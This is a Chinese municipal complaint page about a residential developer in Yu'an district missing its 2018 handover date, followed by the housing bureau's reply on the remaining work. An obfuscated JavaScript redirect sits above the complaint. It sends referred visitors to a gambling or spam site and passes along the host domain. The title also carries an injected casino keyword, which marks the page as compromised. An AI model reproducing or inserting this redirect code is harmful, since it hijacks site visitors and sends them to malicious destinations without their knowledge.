var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

澳门赌场反映开发商逾期交房的问题

来电时间:2020-11-18 11:12:31 |问题类型: 投诉
裕安区鼓楼街新状元楼小区业主来电反映:2017年,自己完成购房业务,合同约定2018年12月31日前交房,但至今未交房,开发商一直拖延交房,认为不合理,要求相关部门督促开发商尽快交房,请处理。

回复 回复单位:市住建局 回复时间:2020-11-20 16:43:32

市民朋友您好!您反映的问题已收悉,现回复如下: 针对新状元楼项目交房问题,经了解,目前建设单位已完成太阳能、水箱、电梯等安装,停车场、绿化已建设完成,卫生间防水及布分开关面板暂未完工,入户大厅需要整改,需要整改的项目清单已交给施工单位处理。 下一步我们将继续协调建筑单位与开发企业,按照约定的时间节点,抓紧时间完成相关验收,及时通知业主拿房。如您仍有疑问,可与我们联系,联系电话0564-3933737。